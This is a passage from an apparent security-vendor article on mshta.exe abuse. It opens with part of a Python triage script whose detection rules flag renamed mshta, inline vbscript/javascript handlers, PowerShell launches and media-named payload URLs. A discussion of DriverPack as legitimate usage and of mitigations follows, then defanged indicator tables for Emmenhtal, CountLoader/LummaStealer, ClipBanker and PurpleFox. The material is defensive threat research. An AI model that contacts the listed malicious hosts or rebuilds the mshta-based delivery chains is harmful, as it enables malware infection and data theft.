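    urls = list(dict.fromkeys(u for layer in layers for u in extract_urls(layer)))
    hosts = [(URL.match(u).group("host") or URL.match(u).group("ip")).lower() for u in urls]
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    signals = []
    if ev.get("OriginalFileName", "").upper() == "MSHTA.EXE" and image != "mshta.exe":
        signals.append("renamed_mshta")               # the PE's OriginalFileName survives a rename
    if re.search(r"\b(?:vbscript|javascript):", cmd, re.I):
        signals.append("protocol_handler")           # script inline on the command line, no .hta on disk
    if re.search(r"wscript\.shell", cmd, re.I):
        signals.append("spawns_wscript_shell")
    if re.search(r"powershell", cmd, re.I):
        signals.append("launches_powershell")
    if urls:
        signals.append("remote_content")
    if urls and parent == "explorer.exe":
        signals.append("run_dialog_parent")          # Win+R paste, the ClickFix tell
    if any(h.rsplit(".", 1)[-1] in ARTICLE_TLDS for h in hosts):
        signals.append("article_tld_pattern")
    if any(u.lower().endswith(MEDIA_EXT) for u in urls):
        signals.append("script_behind_media_name")
    if "`" in cmd or REPL_CHAIN.search(cmd) or len(layers) > 3:
        signals.append("obfuscated_powershell")
    return {"image": image, "urls": urls, "signals": signals}


if __name__ == "__main__":
    for ev in EVENTS:
        r = triage(ev)
        print(f"{r['image']:<16}{', '.join(r['signals']) or '-':<75}{r['urls']}")
```

Each record prints its image name, the signals it raised and the URLs recovered. Two details are worth carrying into a production rule: OriginalFileName is what exposes the renamed iso2022.exe copy, since the file name itself says nothing; and the URL pattern has to accept https:\\ as well as https://, because the CountLoader chain spells the scheme with backslashes and still works. The benign msgbox one-liner raises only protocol_handler, which is the kind of residual legitimate usage a block rule has to account for.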

DriverPack - an example of legitimate usage

Not every MSHTA execution we observed was clearly malicious. A significant portion of detections came from DriverPack's update mechanism, an older software package that downloads driver files from third-party sources rather than through official Microsoft update channels.

Although DriverPack is not inherently malicious, many security vendors classify some of its components as potentially unwanted applications (PUA).

In the cases we analyzed, DriverPack used a scheduled task to launch mshta.exe, which then executed an HTA in memory to check for updates or ensure that the latest version of the software was installed.

While this appears to serve a legitimate software-maintenance purpose, the method is unorthodox and overlaps with techniques commonly used in malicious delivery chains.

This is an important reminder that MSHTA usage is not automatically malicious. At the same time, using MSHTA to retrieve and execute remote content as part of an update workflow is not a recommended design choice, especially when more modern and transparent alternatives are available.

Defense against MSHTA-related attacks generally falls into two broad categories: user awareness and behavior, and the implementation of technical security controls.

Many of the attack chains presented in this article rely on user interaction. In some cases, users are persuaded to download software or media from untrusted websites that promise free or cracked content. In others, they are manipulated through social engineering into willingly executing malicious commands copied to the clipboard. For this reason, user education remains an important line of defense.

Users should be informed about these tactics and regularly reminded of the risks associated with downloading untrusted files, following suspicious instructions, or executing commands they do not fully understand.

Technical mitigations are equally important. MSHTA-based attacks usually do not rely on a single malicious file, but on a chain of script execution, command-line abuse, in-memory stages, and follow-on payload delivery. That is why protection needs to cover multiple points in the attack chain, from attack surface reduction to pre-execution detection and runtime behavioral blocking.

Bitdefender employs various technologies to detect these attacks as part of its layered defense strategy, all of which are integrated into Bitdefender’s security solutions.

Until Microsoft removes legacy scripting utilities that are still present by default in Windows, users can reduce exposure by ensuring that they run a comprehensive security solution, such as Bitdefender Ultimate Security.

Additionally, Bitdefender Threat Intelligence Solutions help organizations detect, investigate, and respond to cyber threats faster by providing real-time intelligence on malicious files, URLs, domains, and IPs. Delivered through feeds, APIs, and the IntelliZone portal, the solutions support both security teams and security vendors with actionable threat data, contextual insights, and automated integrations for stronger cybersecurity operations.

In environments where they are no longer required for legitimate workflows, binaries such as wscript.exe, cscript.exe and mshta.exe should be restricted or blocked, for instance with an AppLocker or WDAC application-control policy that denies them for standard users, or with the Microsoft Defender attack surface reduction rule that blocks JavaScript and VBScript from launching downloaded executable content. Before enforcing such a block, review the remaining executions in telemetry (notification one-liners, login scripts, DriverPack-style updaters) and migrate those scripts to more modern and maintainable alternatives wherever possible.

IoCs

Emmenhtal Loader

Indicator Type Description
AA845A8FB4AB38AEBE6A16A2A8F80CA4467AC0991D3EEF4D8A10BDF97DEDB1E9 SHA256 Initial HTA launched after ClickFix
02630FA994B1566AD1515FD87220FC037B967F07495985A3637D68D7E08C57EE SHA256 Obfuscated PowerShell
1E0E375F3EE82D5AF5DFE6F7DF0E2FAC9A7D37C67ADD3390D05A93AFD85B7C84 SHA256 LummaStealer payload
hxxp[://]185[.]147[.]124[.]40/Capcha[.]html URL Emmenhtal URL
hxxp[://]92[.]255[.]57[.]155/Capcha[.]html URL Emmenhtal URL
hxxps[://]denek[.]local-wanderer[.]shop/RIWZ[.]mp4 URL Emmenhtal URL
hxxps[://]buck2nd[.]oss-eu-central-1[.]aliyuncs[.]com/dir/sixth/singl6[.]mp4 URL Emmenhtal URL
hxxps[://]macphotoeditor[.]shop/singl5[.]mp4 URL Emmenhtal URL
hxxps[://]topofsuper[.]shop/re5[.]mp4 URL Emmenhtal URL
hxxps[://]antibot-check[.]icu/Capcha[.]html URL Emmenhtal URL
hxxps[://]checkpageonce[.]com/singl6[.]mp4 URL Emmenhtal URL
hxxps[://]echoicedeals[.]shop/s6[.]mp3 URL Emmenhtal URL
hxxps[://]kizmond[.]shop/riiw1[.]mp4 URL Emmenhtal URL
hxxps[://]klipjaqemiu[.]shop/web44[.]mp4 URL Emmenhtal URL
hxxps[://]macphotoeditor[.]shop/singl6[.]mp4 URL Emmenhtal URL
hxxps[://]onceletthemcheck[.]com/singl5[.]mp4 URL Emmenhtal URL
hxxps[://]pawpaws[.]readit-carfanatics[.]com/madonna[.]mp4 URL Emmenhtal URL
hxxps[://]propofgustestyle[.]info/recaptcha-verify[.]html URL Emmenhtal URL
hxxps[://]recaptcha-process[.]com/recaptcha-verify[.]html URL Emmenhtal URL
hxxps[://]retrosome[.]shop/ru2-2[.]eml URL Emmenhtal URL
hxxps[://]savecoupons[.]store/s7[.]mp4 URL Emmenhtal URL
hxxps[://]solve[.]gevaq[.]com/awjxs[.]captcha?u=a1bdaa0d-6aab-4d96-bafe-483ef5eb8cae URL Emmenhtal URL
hxxps[://]solve[.]jenj[.]org/awjxs[.]captcha?u=8508de42-23ab-4b24-aa95-eda5feae86e8 URL Emmenhtal URL
hxxps[://]thepremiumstuffs[.]shop/s5[.]mp4 URL Emmenhtal URL
hxxps[://]triptrip[.]melody-wave[.]shop/re2[.]mp4 URL Emmenhtal URL
hxxps[://]check[.]qlkwr[.]com/awjsx[.]captcha?u=03cb013e-aa4a-439e-86af-c3319c7b5dc0 URL Emmenhtal URL
hxxps[://]driftcharm[.]shop/S6[.]mp4 URL Emmenhtal URL
hxxps[://]etrademart[.]shop/s6[.]mp3 URL Emmenhtal URL
hxxps[://]scrutinycheck[.]cash/singl5[.]mp4 URL Emmenhtal URL
hxxps[://]simplerwebs[.]space/anrek[.]mp4 URL Emmenhtal URL
hxxps[://]simplerwebs[.]world/mine[.]json URL Emmenhtal URL

CountLoader / LummaStealer domains

Indicator | Type | Description
memory-scanner[.]cc | Domain | CountLoader / LummaStealer infrastructure
fileless-market[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell1-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
holiday-forever[.]cc | Domain | CountLoader / LummaStealer infrastructure
system-monitor[.]cc | Domain | CountLoader / LummaStealer infrastructure
forest-entity[.]cc | Domain | CountLoader / LummaStealer infrastructure
indeanapolice[.]cc | Domain | CountLoader / LummaStealer infrastructure
files-storage[.]cc | Domain | CountLoader / LummaStealer infrastructure
some-othertag[.]cc | Domain | CountLoader / LummaStealer infrastructure
s3-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s3-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
microservice-update-s2-bucket[.]cc | Domain | CountLoader / LummaStealer infrastructure
parent-control[.]cc | Domain | CountLoader / LummaStealer infrastructure
alphazero1-endscape[.]cc | Domain | CountLoader / LummaStealer infrastructure
microservice-update-s1-bucket[.]cc | Domain | CountLoader / LummaStealer infrastructure
globalsnn2-new[.]cc | Domain | CountLoader / LummaStealer infrastructure
polystore9-servicebucket[.]cc | Domain | CountLoader / LummaStealer infrastructure
hardware-office[.]cc | Domain | CountLoader / LummaStealer infrastructure
immortal-service[.]cc | Domain | CountLoader / LummaStealer infrastructure
globalsnn1-new[.]cc | Domain | CountLoader / LummaStealer infrastructure
acio-patron[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell10-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
globalsnn3-new[.]cc | Domain | CountLoader / LummaStealer infrastructure
alpha-centavr[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell3-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell4-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell5-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell6-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell7-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell8-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell9-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
azure-s3-bucket[.]cc | Domain | CountLoader / LummaStealer infrastructure
hosting-control[.]cc | Domain | CountLoader / LummaStealer infrastructure
communicationfirewall-security[.]cc | Domain | CountLoader / LummaStealer infrastructure
hell2-kitty[.]cc | Domain | CountLoader / LummaStealer infrastructure
domain-monitoring[.]cc | Domain | CountLoader / LummaStealer infrastructure
network-defender[.]cc | Domain | CountLoader / LummaStealer infrastructure
critical-service[.]cc | Domain | CountLoader / LummaStealer infrastructure
google-services[.]cc | Domain | CountLoader / LummaStealer infrastructure
offshore-storage[.]cc | Domain | CountLoader / LummaStealer infrastructure
urugvai[.]cc | Domain | CountLoader / LummaStealer infrastructure
web3-walletnotify[.]cc | Domain | CountLoader / LummaStealer infrastructure
debank-api[.]cc | Domain | CountLoader / LummaStealer infrastructure
py-installer[.]cc | Domain | CountLoader / LummaStealer infrastructure
memory-protection-layer1[.]cc | Domain | CountLoader / LummaStealer infrastructure
s10-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
sentinel1-endpoint-security[.]cc | Domain | CountLoader / LummaStealer infrastructure
s4-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s5-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s6-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s7-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s8-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s9-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s1-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
s2-microservice-updatehub[.]cc | Domain | CountLoader / LummaStealer infrastructure
ms-team-ping6[.]com | Domain | CountLoader / LummaStealer infrastructure
holiday-updateservice[.]com | Domain | CountLoader / LummaStealer infrastructure
health-smooth-eu3[.]com | Domain | CountLoader / LummaStealer infrastructure
health-smooth-eu2[.]com | Domain | CountLoader / LummaStealer infrastructure
fileless-storage-s3[.]cc | Domain | CountLoader / LummaStealer infrastructure
bigbrainsholdings[.]com | Domain | CountLoader / LummaStealer infrastructure
my-smart-house1[.]com | Domain | CountLoader / LummaStealer infrastructure
explorer[.]vg | Domain | New CountLoader infrastructure
ccleaner[.]gl | Domain | New CountLoader infrastructure
microservice[.]gl | Domain | New CountLoader infrastructure
geo-foundation[.]vg | Domain | New CountLoader infrastructure
deluxe[.]gl | Domain | New CountLoader infrastructure
silverhost[.]vg | Domain | New CountLoader infrastructure
msgrouppolicy[.]vg | Domain | New CountLoader infrastructure
holypriest[.]gl | Domain | New CountLoader infrastructure
msedge[.]vg | Domain | New CountLoader infrastructure


ClipBanker

Indicator | Type | Description
333E2192F2551415659FB4094E81B911708921BB588EECF65E27F51C9938DFC2 | SHA256 | checking.ps1
38FE562136ADE372FC4CEDDE67826AEEA8404E93A54A4A4736DDB4C8C8D4C96D | SHA256 | ichigo-lite.ps1
7D0487AFC91B0FE8B2FBF732AB54C3C07E86BF69471BBA6C283AABEA190499BA | SHA256 | del.ps1
185[.]208[.]159[.]199 | IP | IP hosting checking.ps1
87[.]96[.]21[.]84 | IP | IP hosting further payloads
hxxps[://]asq[.]d6shiiwz[.]pw/win/hssl/d6[.]hta | URL | HTA Loader
hxxps[://]asd[.]s7610rir[.]pw/win/checking[.]hta | URL | HTA Loader
hxxps[://]d1[.]pool4883[.]pw/win/hssl/r7[.]hta | URL | HTA Loader
hxxp[://]us1[.]somepools555[.]pw/win/checking[.]hta | URL | HTA Loader

PurpleFox

Indicator | Type | Description
58[.]221[.]252[.]210 | IP | PurpleFox .msi location
60[.]173[.]116[.]152 | IP | PurpleFox .msi location
61[.]136[.]101[.]152 | IP | PurpleFox .msi location
61[.]147[.]108[.]92 | IP | PurpleFox .msi location
89[.]117[.]2[.]159 | IP | PurpleFox .msi location
100[.]1[.]121[.]27 | IP | PurpleFox .msi location
103[.]36[.]223[.]87 | IP | PurpleFox .msi location
103[.]55[.]70[.]212 | IP | PurpleFox .msi location
103[.]83[.]212[.]194 | IP | PurpleFox .msi location
103[.]115[.]17[.]90 | IP | PurpleFox .msi location
103[.]113[.]195[.]244 | IP | PurpleFox .msi location
107[.]175[.]187[.]11 | IP | PurpleFox .msi location
110[.]42[.]51[.]229 | IP | PurpleFox .msi location
110[.]45[.]196[.]155 | IP | PurpleFox .msi location
122[.]165[.]219[.]142 | IP | PurpleFox .msi location
156[.]224[.]232[.]98 | IP | PurpleFox .msi location
157[.]66[.]153[.]154 | IP | PurpleFox .msi location
173[.]208[.]166[.]226 | IP | PurpleFox .msi location
187[.]102[.]48[.]229 | IP | PurpleFox .msi location
190[.]111[.]12[.]242 | IP | PurpleFox .msi location
193[.]112[.]70[.]226 | IP | PurpleFox .msi location
201[.]138[.]238[.]195 | IP | PurpleFox .msi location
204[.]44[.]110[.]216 | IP | PurpleFox .msi location
222[.]73[.]29[.]92 | IP | PurpleFox .msi location

Author


Janos Gergo SZELES

I'm a senior software engineer at Bitdefender. Passionate about malware behavior analysis, I am continuously looking for new tricks employed by malicious actors.
